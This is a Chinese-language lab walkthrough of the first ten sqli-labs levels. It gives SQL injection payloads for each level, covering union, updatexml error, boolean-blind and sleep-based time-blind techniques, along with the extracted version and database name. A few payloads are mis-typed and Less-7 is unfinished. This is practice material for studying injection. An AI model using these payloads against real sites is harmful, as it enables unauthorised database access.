sqli --【1--10】

Less-1（联合查询）

1.查看是否有回显

2.查看是否有报错

3.使用联合查询（字符注入）

3.1判断其列数

3.2 判断显示位置

3.3敏感信息查询

Less-2（联合查询）

1.查看是否有回显

2.查看是否有报错

3.使用联合查询（数字型注入）

3.1判断其列数

3.2 判断显示位置

3.3敏感信息查询

Less-3（联合查询）

1.查看是否有回显

2.查看是否有报错

3.使用联合查询（数字型注入）

3.1判断其列数

3.2 判断显示位置

3.3敏感信息查询

Less-4（联合查询）

1.查看是否有回显

2.查看是否有报错

3.使用联合查询（数字型注入）

3.1判断其列数

3.2 判断显示位置

3.3敏感信息查询

Less-5（错误注入）

1.无显示

2.有错误

3.使用错误注入

Less-6（错误注入）

1.无显示

2.有错误

3.使用错误注入

Less-7（读写文件）

1.查看是否有回显

Less-8（布尔盲注）

1.没有回显

2.没有报错

3.布尔盲注获取数据库名

4.计算数据库名字的位数

5.猜测每一位

Less-9（延时注入--1‘）

1.没有回显

2.没有报错

3.使用延时注入

4.分别查看每一位

Less-10(延时注入--1“)

1.没有回显

2.没有报错

3.使用延时注入

4.分别查看每一位

---

Less-1（联合查询）

1.查看是否有回显

?id=1

2.查看是否有报错

?id=2'

3.使用联合查询（字符注入）

3.1判断其列数

?2' order by 4 --+
判断有3列

3.2 判断显示位置

?id=2' and 1=2 union select 1,2,3 --+
此处为字符型注入，要确定前一段为假

3.3敏感信息查询

?id=2' and 1=2 union select 1,version(),database() --+
​
version() --版本号  ：5.7.26
database()--数据库名称 ： security

Less-2（联合查询）

1.查看是否有回显

?id=1

2.查看是否有报错

?id=2'

3.使用联合查询（数字型注入）

3.1判断其列数

?2' order by 4 --+
判断有3列

3.2 判断显示位置

?id=2' and 1=2 union select 1,2,3 --+
此处为字符型注入，要确定前一段为假

3.3敏感信息查询

?id=2' and 1=2 union select 1,version(),database() --+
​
version() --版本号  ：5.7.26
database()--数据库名称 ： security

Less-3（联合查询）

1.查看是否有回显

?id=1

2.查看是否有报错

?id=2'

3.使用联合查询（数字型注入）

3.1判断其列数

?2') order by 4 --+
判断有3列

3.2 判断显示位置

?id=2') and 1=2 union select 1,2,3 --+
此处为字符型注入，要确定前一段为假

3.3敏感信息查询

?id=2') and 1=2 union select 1,version(),database() --+
​
version() --版本号  ：5.7.26
database()--数据库名称 ： security

Less-4（联合查询）

1.查看是否有回显

?id=1

2.查看是否有报错

?id=2"

3.使用联合查询（数字型注入）

3.1判断其列数

?2") order by 4 --+
判断有3列

3.2 判断显示位置

?id=2") and 1=2 union select 1,2,3 --+
此处为字符型注入，要确定前一段为假

3.3敏感信息查询

?id=2") and 1=2 union select 1,version(),database() --+
​
version() --版本号  ：5.7.26
database()--数据库名称 ： security

Less-5（错误注入）

1.无显示

2.有错误

3.使用错误注入

?id=2 ' and updatexml(1,concat(0x5e,(select database()),0x5e),1) --+

Less-6（错误注入）

1.无显示

2.有错误

3.使用错误注入

?id=2 ' and updatexml(1,concat(0x5e,(select database()),0x5e),1) --+

Less-7（读写文件）

1.查看是否有回显

根据 Use outfile判断，此处使用写入文件的方式

2.

Less-8（布尔盲注）

1.没有回显

2.没有报错

3.布尔盲注获取数据库名

?id=2' and database()='ajest' --+
没有显示，成本太高

4.计算数据库名字的位数

?id=2' and length(database())>0 --+
?id=2' and length(database())=8 --+
​
显示八位
​

5.猜测每一位

?id=2' and ascii(substr((select database()),1,1))=115 --+

115 s

101 e

99 c

117 u

114 r

105 i

116 t

121 y

数据库：security

Less-9（延时注入--1‘）

1.没有回显

?id=1

2.没有报错

?id=1'

3.使用延时注入

?id=1' and if(length((select version()))=6,sleep(5),1) --+
​
版本号共有6位

4.分别查看每一位

?id=1' and if(ascii(substr((select version()),1,1))=53,sleep(5),1) --+

53 5

46 .

55 7

46 .

50 2

54 6

版本号 ：5.7.26

Less-10(延时注入--1“)

1.没有回显

?id=1

2.没有报错

?id=1"

3.使用延时注入

?id=1" and if(length((select version()))=6,sleep(5),1) --+
​
版本号共有6位

4.分别查看每一位

?id=1" and if(ascii(substr((select version()),1,1))=53,sleep(5),1) --+

53 5

46 .

55 7

46 .

50 2

54 6

版本号 ：5.7.26